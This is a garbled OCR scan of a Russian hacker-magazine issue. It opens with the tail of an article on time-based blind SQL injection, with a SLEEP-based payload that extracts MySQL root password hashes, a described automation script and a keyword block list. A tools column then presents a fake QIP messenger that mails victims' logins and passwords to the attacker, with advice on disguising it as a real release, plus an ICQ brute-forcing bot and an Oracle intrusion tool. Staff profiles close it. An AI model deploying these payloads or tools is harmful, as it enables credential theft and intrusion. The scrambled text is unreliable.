щая операция — в случае каких-либо ошибок 
мы всегда будем получать 0. 

Две секунды будет стартовой точкой. 

В упрощенном варианте наш запрос к серве- 
ру выглядит примерно так: 

ЬББр : //ѵісБіш. сот/іпсіех . рЪ.р?іс1=1 
АББ 1= ( ЗЕБЕСТ ЗБЕЕР ( (ОКБ (МІБ (раззм 
огс!,Б, 1 ) ) -4 0 ) ) ЕЕОМ 1 тузді ' . 1 изег ' 
ЩЕКЕ 'изег'= ' гооБ ' ЬІМІТ 1) -- 

Уловил мысль? На всякий случай поясню 
действия запроса: 

1. Извлекаем Ы-ный символ пароля; 

2. Конвертируем символ при помощи функ- 
ции 0В0(] в его АЭСІІ-значение; 

3. Полученное числовое значение передаем 
функции 5ЕЕЕР(]. 

АВТОМАТИЗАЦИЯ 

Итак, принцип ясен, но вручную этим зани- 
маться — неблагодарное дело. Можно, конеч- 
но, на листке записать таблицу соотношений, 
а в руках держать секундомер и ждать ответ 
сервера. Оставим это для суровых челябин- 
ских парней, мы с тобой знаем про поговорку 
«время-деньги». Специально для тебя я 
написал Регі-скрипт, который поможет авто- 



ПРОЦЕСС РАБОТЫ РОС-СКРИПТА 



матизировать рутинный процесс. 

Скрипт довольно-таки прост, но на вся- 
кий случай в нем есть небольшой хелп (на 
английском). В двух словах: сценарий выпол- 
няет задачу не полноценного инструмента, а, 
скорее, показательного примера, так сказать, 
Ргооі" 01 СопсерЕ 

Хочу обратить твое внимание на один из 
параметров скрипта «-р» (сокращенное 
ргесізіоп, или по-русски, точность). Что он 
делает, я объясню чуть позже. 

Принцип работы скрипта таков — сначала 
он тестирует, применим ли метод, а в случае 
успеха выбирает пароль для пользователя 
гооі: (по умолчанию), если такая удача имеет 
место быть. К сожалению (а может, к сча- 
стью), он не идеален, и ты легко его можешь 
заточить под себя. 

ЛОЖКА ДЕГТЯ В БОНКЕ МЕДА 

Один из существенных недостатков метода — 
он чувствителен к непропорциональному 
времени отдачи страницы, которое никогда 
не будет одинаковым: и сервер отвечает с 
разными задержками, и сама сеть никогда не 
будет идеально стабильной, ну и много дру- 
гих второстепенных факторов могут мешать. 
Разберем суть проблемы — к примеру, у нас в 
пароле текущий символ 2, тогда при идеаль- 



ных обстоятельствах полученное значение от 
паузы будет 5 (в секундах). 

После всех преобразований АЭСІІ-значение 
будет 50, что и есть 2. 

Но, допустим, ожидаемый ответ приходит на 
полторы секунды позже, чем предполагалось. 
По времени это уже получится 6.5 секунд, 
АЭСІІ-значение 52, а символ и вовсе — 4. На 
локальном сервере все работает безупреч- 
но, без каких-либо «паразитных» задержек, 
но нам надо использовать метод в полевых 
условиях. 

Решил я проблему, введя специальный 
коэффициент — точность, или, как в скрипте 
написано, ргесізіоп. Это и есть один из пара- 
метров скрипта, «-р». 

Данный коэффициент позволяет расширить 
диапазон допустимых значений задержек для 
каждого символа, то есть каждому символу 
теперь выделен некий интервал времени. 
Думаю, график выразит мысль лучше, чем 
слова. 

Фактически, коэффициент «точность» соот- 
ветствует количеству секунд, которое отво- 
дится дополнительно для каждого символа. 
Чтобы прояснить ситуацию, вернемся к про- 
шлому примеру. 

В том случае мы получили 6.5 секунд, что 
привело к неправильной интерпретации 
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О Ьир://іосаІЬо&1:/5дІіа,рЬр?гс1=-1 - Орега 



Еііе ЕШ Міеѵѵ йооктагкз ѴѴісІдеІз Іооіз Ыеір 
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ЛОГИ АРАСНЕ С НАШИМИ ЗАПРОСАМИ ВО ВСЕЙ КРАСЕ 



полученных данных. Теперь же, если мы 
возьмем ргесізіоп, равный двум, то после 
расширения интервала допустимых значе- 
ний для символа 2 диапазон уже будет 11-13 
(включительно]. Таким образом, добавляя 
к стартовому значению 11 секунд дополни- 
тельные «паразитные» полторы секунды, мы 
получим 13,5 секунд, но наша кривая чертова 
дюжина уже среди допустимых значений. 
Хочу отметить, что при повышении коэффи- 
циента точности увеличивается общее время 
ожидания. При точности, равной 0, время 
извлечения строки длиной в 41 символ (хеш 
пароля и астериск] составляет около 400 
секунд, дальше на каждую единицу точности 
время ожидания увеличивается примерно на 
318 секунд. 

Долго, но что делать, когда такие суровые 
условия? Тем более, я уверен, что и данный 



метод подлежит оптимизации. Допустим, 
сократить общее время ожидания можно за 
счет многопоточности. Еще как вариант я 
вижу применение группировки символов — 
создать определенную группу символов 
(путем 5СН_-запроса] на некий период време- 
ни, а там разбираться по алгоритму, что при- 
менен в показательном скрипте. Но это уже 
детали реализации конкретного решения, не 
относящиеся к теме. 

Если ты посмотришь в исходник скрип- 
та, то увидишь, что запрос существенно 
длиннее и отличается от приведенного 
в статье. Дело в том, что запрос состав- 
лен таким образом, чтобы исключить 
диапазоны ненужных символов, оставив 
только те, что встречаются в строке, 
которую мы извлекаем — «0-9, А - 2 . *». 
Для примера я взял хеш пароля пользовате- 



ВЕІМСНМАРКО В СПИСКЕ БЛОКИРУЕМЫХФУНКЦИЙ ОКЕЕМБОІ-'ОМ 

82 # ВЗ_ОСК 5ес*іоп ІІ5І5 депегаі 50І_ согшапсІБ -Міа* ыіі! Ье Ыоскесі, 

83 [Ыос к] 

84 л эе* раззѵюгсі 

85 А дгап1 

86 л кіІІ 

87 л НапсІІег 

88 "геѵоке 

89 ІЧизІі ргіѵііедеа 

90 сгеа^е и вег 

91 гігор и$ег 

92 гепате и$ег 

93 Ьаскир *аЫе 

94 гезіоге !аЫе 

95 Іоасі -Ше 

96 Іоасі сіа^а 

97 іпіо оиг^ііе 

98 іп1:о сіитрі^ііе 



ЬепсИтагк\5*\І 



100 Іоасі -Рііе 



ля. Думаю, тебе не составит проблем разо- 
браться в запросе, а если что, обращайся к 
руководству Му5СИ, ну или ко мне. 

Второй недостаток метода — сложность реа- 
лизации. Не обойтись без средств автома- 
тизации, то есть, задействовать такой прием 
в полевых условиях крайне тяжело, да и не 
оправдывает средств. Однако заготовка уже 
есть, да и самому написать свой инструмент, 
думаю, нетрудно. 

И ЭТО ВСЕ? 

Наверное, ты хочешь спросить — «и где же 
тут продвинутость?». Да, время выполнения 
не конек метода, но зато мы имеем всего 40 
запросов для 40-символьного пароля МуЗОИ 
при отсутствии вывода каких-либо данных в 
слепых ЗОИ-инъекциях. 

Повышая количество запросов, мы можем 
оптимизировать общее время, ведь даже 
десяток лишних строк не сильно повы- 
сят степень риска быть замеченным. Все 
вышеописанное относится не только к 
МуЗСИ и вполне может быть реализовано 
на других серверах. Например, в РозТгеЗСИ 
нашу ЗИЕЕРО функцию можно заменить на 
рд_5Іеер(], ну и так далее. 

Это лишь метод, его можно и нужно модифи- 
цировать, оптимизировать и расширять. 
Конечно, он далеко не идеален, но куда 
проще для таких критических случаев, 
как слепая инъекция без каких-либо 
активных признаков этой самой инъ- 
екции. Впрочем, эффективность этого 
метода можно повысить и можно соору- 
дить более продвинутый фингерпринтер 
базы данных для слепых ЗОИ-инъекций. 
Простор для фантазии неограничен, 
остается лишь подхватить идею. Так чего 
же ты медлишь? □с 
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ПРОГРАММЫ ДЛЯ ХАКЕРОВ 




ПРОГРАММА: ОІР Раке 

ОС : ѴѴІЫ00ѴѴ5 2000/2003/ХР/ѴІ5ТА/7 

АВТОР: ЛУКА 




Фейк Квипа 

Представляю очередноетворениеуже знако- 
мого тебе по предыдущим выпускам Х-Тооіз 
Луки ( ііѵказоЛ.ЗсІп.ги ) — фейк известного 
ІСО-мессенджера ОІР. Прога представляет 
собойточную копию начальных окон клиента 
ОІР 2005 ВиіШ 8092. Общий смысл работы 
программы: сначала жертва запускает фейк 
на своем компьютере, затем производит не- 
обходимые манипуляции (настраивает сервер, 
прокси, ставит нужные галки), вводит логин и 
пароль в соответствующие окна и нажимает 
кнопку «Подключиться» или «Только открыть». 

В этот момент прога отсылает на твою почту 
новое сообщение вида: 

от кого : Лука 
тема: ЛукаЗокк . Збп . Ки 
Етаіі отправителя: Лук@Ьк.ги 
текст: иіп;разз 

После отправки сообщения фейковый клиент 
выдает ошибку сервера. 

В папке же самой программы есть три файла и 
две папки: файл *.Ы:т можно сразуудалять, 
остальное оставляй нетронутыми и передавай 
жертве :). 

Настройки программы находятся в файле ОІР\ 
ВкіпзѴзкіпз.сІ'д: 

• первая строка должна содержать е-таіі, куда 
будут приходить сообщения; 

• вторая строка — надпись в первом загрузоч- 
ном окне; 

• третья строка содержит цвет фона надписи в 
первом загрузочном окне. 

Также ты можешь изменить рисунок из ОІР\ 
ЗкіпзМСОбЫаНдрд — это изображение загру- 
зочного окна. 

Впарить фейкжертве — это задача для твоих 
навыков социальной инженерии, но вот воз- 
можный способ отавтора программы: качаем 
ОІР 2005 [ ЫірТ/дір.ги/ги/радез/сІоѵѵпІоасІ дір ги ] 
и переносим все файлы из папки фейка в папку 



ОІР, пакуем получившееся творение любой 
программой инсталляции и выкладываем 
где-нибудь в Сети со следующим возможным 
текстом: «вышел новый ОІР 2005» :]. 

П РО ГРАМ МА: АгхБсапБіІе 

ОС: ѴѴІЫйОѴѴЗ 2000/2003/ХР/ѴІ5ТА/7 

АВТОР: АРХѴѴОЬР 

Далее на повестке дня еще один уже знакомый 




Сканер директорий сайта 

тебе кодер — АгхѴѴоІі из команды ѵѵебхакер.пеі: — 
и его многопоточный сканер директорий сайта. 

В каком случае тебе пригодится такой сканер? 
Допустим, ты хочешьузнать строение сайта, 
но нетжелания перебирать и искать файлы 
ручками, значит, все это за тебя может сделать 
полностью настраиваемый, многопоточный и 
очень быстрый сканер директорий и файлов со 
встроенной системой «Передышки», которая 
позволиттебе обойти практически любые 
АпбООоЗ-скрипты. 

Возможности программы: 

• многопоточность (от 1 до 50 и более 
потоков) 

• работа с протоколами кккр и кккрз 

• опциональный вывод ответов (НТТР 
200, 301, 404, 403, 401, 302) 

• большая экономия трафика (качаются 
только заголовки) 

• возможность работы через Ргоху/ 
Зоскз сервер 

• удобный вывод результата работы 
(табличный и текстовый) 

• открытие ссылок прямо в окне про- 
граммы 

• выбор одного из трех браузеров для 
открытия ссылок 

• передышка (для предотвращения 
ддоса) 

• конфигурационный файл (все на- 
стройки программы находятся именно 
в нем) 

• возможность указать свои НТТР-за- 



головки (ЮзегАдепк, Кекегег и т.д. ) 
• большой файл базы данных, который 
всегда можно отредактировать 

База данных программы содержит списки 
файлов и директорий вида: 

.йкассезз 
. йксопкід 
. ккраззѵтб 
_абш/ 

_іпзка11/ 

_шузд1/ 

_покез/ 

_ргіѵаке/ 

_ирбаке . рйр 
_ѵоір/ 

_ѵкі_Ьіп/ 

-іпзкаіі . рЬр 
-ирбаке . ркр 
І.ркр 
1/ 

2003/ 

2006/ 

2007/ 

2008/ 

666 / 

абоик . рЬр 
абоик/ 
ассезз 
ассезз_1од 
ассоипк . азр 
ассоипк . Ылпі 
ассоипк . ркр 
асск_1одіп/ 
абб/ 

аббпемз / 
абш/ 
абш2/ 
абшіп . азр 
абшіп . сід 
абшіп . бак 
абшіп . ккші 
абшіп . іпс 
абшіп . ркр 



ПРОГРАММА: Зіогт 2008 ВгиЫ 
Есііііоп 

ОС: ѴѴІЫйОѴѴЗ 2000/2003/ХР/ѴІ5ТА/7 

АВТОР: ОІР 

Зіюгт 2008 Вгікаі Ебібоп — скромный ісд-бот, 
который пригодится всем, кто занимается бру- 
том ІСО-уинов на выделенных серверах. 

Он предназначен для облегчения управления 
брутом и его автоматизации. Работает совмест- 
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нотолько с .ВгиІаЮ. 3-0.8+ (есть версия и для 
ІРО-брута, ноеемы не будем описывать, так как 
брутфорсер безнадежно устарел]. 

ВОЗМОЖНОСТИ: 

• удаленное управление .Вгиіаі (например, 
нажатие кнопокостановки и запуска, сіеапир, 
показ статистики, скрытие и показ окна); 

• управление командной строкой ѵѵіпсіоѵѵз на 
сервере; 

• отправка новых доосГов на ісц-номерЫ 
администратора; 

• организация очереди списков для б рута ; 

• автоматическое обновление прокси через 
заданный промежуток времени (прокси 
могут скачиваться из интернета в виде текс- 
тового файла, либо используется локальная 
копия списка, которую можно обновлять 
вручную); 

• простая система администрирования; 

• управление возможно с нескольких номеров; 

• для каждого номера можно установить свои 
настройки; 

Дополнительные возможности: скачка файлов 
из интернета, ісц даіе (использование бота в 
качестве гейта], отправка, принятие сообще- 
ний ит.д. 

Списокосновных команд: 

1. Вгиіаісопігоі. 



А 






/зСакз (ог 1) — зЬом . ВгиСаі 
зСаСізСісз 

/зСагС — ргезз ' зСагР 1 ЬиССоп іп 
. ВгиСаі 

/зкор — ргезз ' зСор' ЬиССоп іп 
. ВгиСаі 

/раизе — ргезз ' раизе' ЬиССоп іп 
. ВгиСаі 

/сопкіпие — ргезз ' сопкіпие' ЬиССоп 
іп . ВгиСаі 

/сіеапир — сіеап ргохіез іп . ВгиСаі 
зупСах: /сіеапир [ргоху_Ьуре] 
ргоху Рурез: ЬРСрз (Ь) , зоскз4 (з4) , 
зоскзБ (з5) 

поре: тРЬоиР рагашеРег = сіеапир 
аіі ргохіез 

/ЬгРорР — сіізріау .ВгиРаІ орРіопз 
/ЦЬгеасХз — зеР РЬгеаЬз соипР 
зупРах: /СЬгеасХз ѵаіие 
/РішеоиР — зеР РішеоиР орРіоп 
зупРах: /РішеоиР ѵаіиеі ѵа1ие2 
поре: ѵа1ие2 изесі опіу ѵ^іРк .ВгиРаІ 
0.5 

/сІпРіше — зеР сіеапир Ріше 
зупРах: /сІпРіше ѵаіие 
/аиРозаѵе — зеР аиРозаѵе Ріше 




зупРах: /аиРозаѵе ѵаіие 

/зЬ.оѵ\Г — зЬсж .ВгиРаІ апсі ЬоР ѵ/іпсісжз 

/ііісіе — ііісіе . ВгиРаІ апсі ЬоР міпсісжз 

/гипЬгР — гип апсі зРагР .ВгиРаІ 

/кіІІЬгР — Ьагсі РегшіпаРе ЬгиРе 

ргосезз 

/дооЬ — зЬсж дооЬ ІізР 

2. Во! асіппіпізігаііоп. 

/абшіпіізр — зЬсж асітіп ІізР мікЬ 
регшіззіопз 

/аскі — асісі ІІШ Ро асітіп ІізР 
зупРах : /асісі ОХК 1 [ : регшіззіопз ] 
ех.: ' /асісі 123123 ' , ' /асМ 321321 : +- 
+ -- 1 

регшіззіопз: 1 — зепсі пем доосі 1 з , 2 

— аііотлг Ро изе сотшапсіз , 3 — аііом Ро 

изе /зРаРз, 4 — аііом Ро абтіпізРгаРе 

ЬоР, 5 — поРіРу РегтіпаРіпд 

ЬеРаиІР регшіззіопз із - + + + - 

/ЬеІеРе — ЬеІеРе ЬШ Ргот асітіп ІізР 

зупРах: /ЬеІеРе ЬШ 

/рсЬапде — сЬапде регшіззіопз 

зупРах: /рсЬапде ІІШ : регт_ 

іпсіех: регшіззіоп , /рсЬапде 

ЬШ: регшіззіопз 

ех. : ' /рсЬапде 123123 : 1 : + ' , '/ 

рсЬапде 321321:+-+-+' 

/зеРРіпдз — сіізріау ЬоР зеРРіпдз 

/зеР — зеР ЬоР зеРРіпдз 

зупРах: /зеР -орРіоп ѵаіие 

поре: Рог іпРогтаРіоп зепсі ’/зеР ?' 

/ЬоРіод — зЬом ЬоР іод 

зупРах: /ЬоРіод [соипР] ЬеРаиІР 



Встроенный генератор позволяет создавать 
списки иіпіразз прямо через бота, используя 
списки номеров, паролей или пароли, переда- 
ваемые в параметр команды. Таким образом, 
можно создать несколько списков и долго 
не заходить на сервер, бот сам будет менять 
списки, обновлять прокси и присылать новые 
номера. Присутствует также возможность 
восстановления процесса брута после разрыва 
связи с сетью. Бот делает резервную копию 
списков прокси после разрыва, а когда связь 
снова появляется, восстанавливает все прокси 
и запускает брут, поэтому не нужно больше бес- 
покоиться о бесполезных простоях сервера. 
Также нельзя не отметить продвинутую систему 
плагинов для бота, найти которые (и почитать 
об остальном функционале и командах] можно 
на официальном сайте проги — ЬЬрѴ/дір-Ыод. 
еи.огд/5іюгт2008Ье . 

ПРОГРАММА: Ордсі.Е5ЕсирітѵТооі.5 
(6Ш) 

ОС: ѴѴІЫ00ѴѴ5 2000/2003/ХР/ѴІ5ТА/7 
АВТОР: СѴВЕР$ЫАКЕ 




соипС із 10 

поСе: іагде шеззадез ттііі поС Ье 
Ьеііѵегесі 

/шеззіод — зЬоѵг шеззадез іод 
зупках: /шеззіод [соипС] ЬеТаиШ 
соипС із 10 

поСе: іагде шеззадез ѵтііі поС Ье 
Ьеііѵегесі 

/ріидіізЦ — зЬотт іізС оТ ріидіпз 
/сігіод — сіеап зузСеш апсі шеззадез 
іодз 

Преимущество бота перед конкурентами в том, 
что он предоставляет широкие возможности 
поуправлению процессом брута, ибо делает 
всю ручную работу за тебя. Обновление прокси, 
организация списков для брута и отправка 
новых номеров прямо ктебе в ісц позволятэко- 
номить время и трафик (и при этом быть в курсе 
событий, происходящих на сервере]. Скрытие 
окна брута (в том числе и своего] и иконки в 
трее дадут шанс избежать того, что твою учетку 
заблокируют администраторы. 

Управление командной строкой при помощи 
бота открывает полный доступ к серверу. Очень 
удобная фича.таккаксее помощью можно 
делать практически все: управлять файлами, 
учетными записями, перезагружать сервер, 
работать с консольными приложениями (в 
частности, консольные га г и 2 і р ] и т.д. 



Массовая смена инфы 

Что это мы все «МуБОБда Му50І_»? Пора бы 
уже и на другие базы да иных внимание 
обратить. Представляю тебе Огасіе БесигБу 
Тооіз — программное средство, предназначен- 
ное для тестирования на безопасность СУБД 
Огасіе 8і-9і, 1 0д, 1 1 д. Прога работает без Огасіе 
Сііепі и дополнительных модулей и позволяет 
имитировать проникновение в СУБД Огасіе с 
помощью существующих в ней уязвимостей. 
Возможности и функционал проги: 

• повышение привилегий пользователя Огасіе; 

• проверка системных аккаунтов Огасіе на 
наличие пароля поумолчанию; 

• проверка аккаунтов Огасіе на соответствие 
логин=пароль; 

• повышение привилегий в ОС ѴѴіпсІо\л/5 2000/ 
ХР/2003 (добавление локального пользова- 
теля с правами администратора и удаленного 
подключения); 

• проникновение в ОС и выполнение команд 
БОБ с правами администратора системы; 

• просмотр соединений пользователей с базой 
данных и их действий; 

• анализ внешнего ТЫБ Іізіепег.іод; 

• многопоточный сканер портов; 

• тестирование на проникновение. 
Подробности ищи на официальном сайте про- 
граммы зесщюіооізти. т 





л: 
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иьмьзнАкшыл 

х-мзнов 

ПРОШЛОГО ДЕСЯТИЛЕТИЯ 



Британские ученые доказали, 
что период полувыведения ин- 
формационных токсинов, заража- 
ющихтвой мозгчерез просмотр 
телевизионных ботов из новогод- 
него голубого экрана, составляет 
не менеетрех месяцев. 

За это время они разрушаюттвой 
организм сильнее микробов, 
обитающих под ободком унитаза, 
или даже клещей, пытающихся 



поиметь нас через ковровое пок- 
рытие. Ксчастью, русские ученые 
нашли классический способ 
лечения — «клин клином выши- 
бают». Смело принимай лекарст- 
во от доктора Лозовского, ведь 
твоему вниманию предлагается 
статья о семи самых культовых 
журналистах Хакера за послед- 
нее десяти (ой, уже двенадцати) 
летие! 



► 074 







ЗІЖегака 

Сергей 

Покровский 

КОГДА ЗАРУЛИВАЛ: С САМОГО НАЧАЛА 

Жалобы: выяснить неудалось, хотя на мо- 
мент написания статьи Серега чем-то болел. 

Анамнез 

Если бы я был главным редактором, я бы 
все рабочее время сидел на завалинке, 
любовался бы на облака, курил бы махорку, 
грыз бы семечки и давил мух на окне. А что 
делать? В социальных сетях я не зарегист- 
рирован, ЖЖ не веду, а команда все равно 
вся при деле: редакторы — генеряттемы, 
прессуютавторов, доводяттексты. Литера- 
турный редактор — исправляет ошибки в 
том, что прошло мимо бдительного взгляда 
редакторов, верстальщик — верстает, арт- 
директор — овладевает верстальщиком и 
генерит дизайн, выпускающий редактор — 
прессует всех и рулит всем вышеперечис- 
ленным контингентом. Красота! Нучто, по- 
велся? Конечно же, я фантазирую. Если бы у 
тг были такие главные редакторы — Хакера 
просто бы не существовало. Например, бла- 
годаря энергии первого главреда — Сереги 
Покровского, Хакер, во-первых, появился 
на свет, а во-вторых — стал известнейшим 
отечественным изданием, который, бывало, 
соревновался по продажам с грандами вроде 
«Меп’з НеаЛЬ» и «Максим» (ничего удиви- 
тельного, ведь пт — это «мужской и развле- 
кательный» журнал. ЗІІХЛег’а хватало на все 
и на всех: 

Арт-директор? А вот, кстати, у меня для тебя 
есть три варианта новой обложки, пойдем, по- 
кажу. И что это у тебя тут в дизайне статьи? Не, 




вот сюда надо добавить злого робота, сюда — 
человеческий мозг, а сюда — Холода в трусах и 
с вантузом наперевес. Холод — там, вантуз — 
чутьлевее, около кулера. 

Редактор? А про взлом ІРС мы писали? Не 
писали! Надо написать, я как раз тут тусуюсь 
на одном канале, кое-что интересноеузнал, 
завтра напишу. 

Литературный редактор? Почему в одной статье 
у нас«крэкинг», а в другой — «крекинг»? Не, 
это не дело: нам нужно стандартизировать весь 
компьютерный жаргон! Выпустим правила, все 



пропишем, у меня уже кое-что написано. 
Таконо все и было. Со временем Серега передал 
свой пост2роізоп5ака Александру Сидоровско- 
му, а сам —ушел на повышение, став издателем 
всей цифровой группы журналов Геймленда. 
Диагноз: Покровский — человек-атомный 
реактор. Папочка Хакера. Спасибо Синтезу 
за наше счастливое детство! 

В настоящее время он занимается проектом 
ЫЦрѴ^ипкеѵ.ги . и при самом поверхност- 
ном ознакомлении с этим ресурсом ты уви- 
дишь, что Синтез ничуть не постарел :). 




Ог.СосІ ака Федор 
Добрянский 

КОГДА ЗАРУЛИВАЛ: С ДОИСТОРИЧЕСКИХ 
ВРЕМЕН. КОГДА ВСЕ ПРИШЛИ, ОН УЖЕ 
БЫЛ (ДЕКАБРЬ 1998). 

Жалобы: По старой традиции Добрянский их 
скрывает. Вместо этого он копипастити шлет 
нам жалобы из справочника прабабушки-вра- 
ча, симулируя литейную лихорадку, водянку 
яичка и легкое рубщика клена одновременно. 

Анамнез 

Каждый Х-мэн запомнился нам чем-то 
особенным, не стал исключением и Доктор 
Добрянский. Со стародавних времен Ог.СосІ 
нес знамя и всячески иллюстрировал собой 
стереотип техногенного компьютерного гика, 
жесточайшего хардварного маньяка и просто 
законченного «радиолюбителя» с паяльником 
вместо... эээ... ну, скажем, просто с паяльником. 



Да, он вел рубрику ЕАО (не путать с Наск-ЕАО, 
раньше это были разные рубрики!], прикалы- 
вался и дичайше угорал наравне со всеми, но 
воистину прославился сей господин своими 
бесчеловечными опытами на ниве пайки, 
сварки, кройки и шитья. Он сконструировал те- 
леглушилку и самоходного робота, низкоомный 
виброчепец и металлоискатель, лазерофон и 
биодетектор. Обо всех этих достижениях он не 
забывал писатьвХакер и ХакерСпец (рубрика 
«Паяльник»], и читателей это радовало, пос- 
кольку позволяло получать максимум хулиган- 
ского результата при минимуме радиодеталей. 
Впоследствии Добрянский покинул журналы, 
мигрировав в другое подразделение компании — 
тестовую лабораторию, где занимался сам 
понимаешь чем, и широко прославился в узком 
круге редакторов жесточайшими задержками 
конечных материалов :] — бывало, что он ски- 
дывал нам результаты тестов новых девайсов 
(хардов, моников и прочих матплат) в день 
засылки журнала втипографию. 



Диагноз 

Доктор Добрянский — автор вошедшей во 
всемирную историю Резолюции о неделе 
порабощенных наций, принятой еще в 1959 
году. Стоп, это другой Доктор Добрянский. У 
нашего же диагноз прост: «Каждый вечер и 
каждый восход Доктор Добрянский паяльник 
берет». Сейчас он журналистикой напря- 
мую не занимается, а занят он (цитирую): 
«поддерживаю информационные системы, 
пишу софт для моделирования динамичес- 
ких опционных позиций, продвигаю один 
хороший бренд». 

От себя: Аещея преподавал в МИРЭА 
«Аппаратные Средства Вычислительных 
Сетей», вел научную работу по системному 
моделированию СБИС СнК, разрабатывал 
Мощщщщные Лаззззеры в ИОФАН РАН, был 
главным редактором сайта по инвестициям, 
написал книгу «Управление Фрилансерами», 
занимался моделированием динамических 
опционных позиций. 
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Ноіосі ака 

Александр 

Черных 

КОГДА ЗАРУЛИВАЛ: С 1999 ГОДА 

Жалобы: а почему вас это интересует? [ел- 

ки-палки , мы попали , ведь Холод увле- 
кается психологией — прим. Лозовского]. 

Анамнез 

Есть та кие люди, которые, кажется, никогда 
не устают. Они все время на подъеме — в 
курсе всего, генерят, креативят, у них всегда 
есть новые идеи, время для их реализации и 
при этом — куча времени для общения, тусо- 
вок и гонок на машинах. Таких людей мало, и 
наш Холод — один из них. Благодаря своему 
организаторскомуталанту и способности 
создавать вокруг себя ощущение «команды» 
(которое магическим образом распростра- 
нялось и на наших читателей), Александр 
стал одним из самых известных журнал и сто в, 
работавших в Хакере, Спеце и Хулигане: 
он руководил авторами, отвечал на письма 
читателей и читатели с удовольствием их 
ему писали :), а фразы вроде «твои пупыр- 
чатые суслики» или «целуем в десны, твои 
мухорчатые гонобобели» в среде фанатов 
т приобрели определенную меметичность. 




НоггіПс ака 
Михаил Фленов 

КОГДА ЗАРУЛИВАЛ: С 1 999 ГОДА 

Жалобы: На отсутствие прежнего командного 
духа в нынешней х-сгеѵѵ. 

Анамнез 

Брутальный ростовский парень, програм- 
мист Ростсельмаша по имени Михаил мог 
бы появиться на пороге нашей редакции 
еще в момент подготовки второго номера 
журнала, но, разумеется, он этого не 
сделал. По уважительной причине — жил 
он тогда за тысячу километров от редак- 
ции. Поэтомуон откликнулся на пред- 
ложение Покровского по электропочте 
и после небольшого собеседования был 
принят в штат авторов. Будучи мощным 
компьютерщиком, со временем поднимая 
все больше и больше статей (рекорд — 7 
статей в номере!) и ежемесячно отвечая 
на вопросы читателей в Наск-РАО, Ноггіічс 
очень быстро превратился в одного из 
самых заметных авторов тогдашнего т . 
Неудивительно, что, когда БІЫіег начал 
планировать изменения в журнале, была 
одобрена именно его концепция — план 
создания рубрики «Кодинг», а единствен- 
ным условием ее существования, которое 




Как я уже говорил, отметился Холод сразу в 
трех, начинающихся с буквы X, журналах: в 
качестве журналиста и редактора Хакера, 
главного редактора спецвыпуска Хакера и 
главного же редактора журнала Хулиган. Куда 
он, кстати, и перенес угар, бесшабашность и 
бакланизм старого Хакера :], от которого в те 
годы (2003-2004-й) взсначали постепенно 
отказываться. 

Диагноз: Человек-динамит, человек-ко- 
манда! Сейчас — расстался сжурналистикой 
вообще и со сферой ІТ в целом, полностью 



посвятив себя НП (Ьитап гезоигсез]. Работает 
советником управляющего директора по рабо- 
те с персоналом компании «Диасофт». 

От себя ! Лично считаю, что Хакеру реально 
повезло с Покровским какс первым Главным — 
отличный лидер, человек-зажигалка, который 
ни минуты на месте не сидел, все время при- 
кручивал что-нибудь, да новые поля распахи- 
вал. Таких больше нет. С радостью вспоминаю 
доктора Добрянского и Донора, которые были 
исключительными западлостроителями выс- 
шей пробы. 




НОККІРІС 
В НАШИ ДНИ: 
БУРЖУАЗНЫЙ 
КАНАДСКИЙ 
ПРОГРАММИСТ! 



было поставлено перед Михаилом, было 
«не ботанить» :). Он и не ботанил — рабо- 
тая на вышеупомянутом заводе кодером 
и специалистом по БД (из 40000 налогоп- 
лательщиков], он колбасил статьи в т . 
активно неся в массы знания и наш фир- 
менный стиль, разрабатывал шароварные 
программы под собственной маркой и 
писал книги. 

Диагноз 

Пожалуй, один из столпов Хакера начала века, 
показывающий, что «просто о сложном» — это 
не просто лозунг, а руководство к действию. 

Да что там говорить, благодаря его статьям и 
его сайту, который он пиарил в тг . я узнал кучу 
нового о программировании, познакомился с 
самим Ноггібс’ом, а затем и попал автором в 



□-^образца 2001 года :). Сейчас он живет в Ка- 
наде, работает в крупной ѵѵеЬ-девелоперской 
компании, успевая при этом поддерживать аж 
три собственных проекта — ѵѵѵѵѵѵ.сѵсізоіі.сопп . 
ѵѵѵѵѵѵ.Ііеараг.сот и ѵѵѵѵѵѵЛепоѵ.іпЬ (на самом 
деле их четыре, но это число не очень краси- 
вое и я решил его немного округлить]. 

От себя 

Это сейчас я уже готов писать в Хакер 
хоть бесплатно, если бы время было, 
а тогда начинал писать именно ради 
денег. Все банально — деньги и новые 
ощущения. Хотя деньги тогда были на 
первом месте. Я работал программистом 
на Ростсельмаше, а этот завод стоял и 
зарплату не платил. 



► 076 
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Даня ака Даниил 
Шеповалов 

КОГДА ЗАРУЛИВАЛ: С ДЕКАБРЯ 1999 
ГОДА 

Жалобы: на врагов, которые башляютему 
хороший кэш и поста вляютюныхлюбовниц 
( есть маза, что он скорее хвастается — 
прим. Лозовского]. 

Анамнез 

Во-первых, Даниил Шеповалов — это не 
псевдоним. И даже нетворческий коллектив. И, 
разумеется, никакой не инопланетный разум — в 
конце прошлого века это был обычный студент- 
программист, изучавший компьютерную графику 
и генетические алгоритмы днем и гасившийся 
на рейвах по ночам. Такбы ему и оставаться 
простым студентом, если бы не некий мисти- 
ческий предмет, который он нашел на крыше 
Эрмитажа в процессе мастурбации о^уда в Неву. 
Подробнее мы не можем об этом рассказать, 
бумага этого просто не выдержит, поэтому сооб- 
щим тебе результат: на следующий день 51 ІМІеі, 
шарящий в яндексе на предмет слова... какэто 
ни странно, «юмор», попал на Данину страничку 
и пригласил его в команлу т . Дальнейшеетебе 
известно — темная сила артефакта, помножен- 
ная на мощный интеллект Дани, начала мощно 
изливаться на страницы Хакера. Она сделала 
данного господина настолько широко известным 




МіпсІѵѵОгк ака Олег 
Чебенеев 

КОГДА ЗАРУЛИВАЛ: С 2003 ГОДА 

Жалобы: на присутствие геев в команде 
Хакера образца 2004 года (подробности — ниже. 
Внимание! Наличие геев в команде Хакера 
научно не доказано!). 

Анамнез 

Как известно, на факультете физики учат 
физиков, а на факультете журнал и стики — 
журналистиков. Специально обученных пятью 
годами журфака журналистов в т ни когда не 
водилось, видимо, поэтому мы никогда не писа- 
ли про пришельцев, похищающих нижнее белье 
у звезд эстрады и волшебные крема из таеж- 
ного меда, которые нужно употреблять вместо 
термопасты с целью увеличения производи- 
тельности. Да, я отвлекся, но не просто так — 
суть втом, что именно Олег, вдохновленный 
фильмом «Хакеры», но ни разу хакером не яв- 
лявшийся, воплощал в нашем журнале «Жур- 
налиста» — человека, который способен взять 
интервьюу Билла Гейтса, Евгения Касперского 
и Криса Касперски вместе взятых (хотя испы- 
тания адронного коллайдара доказали, что 
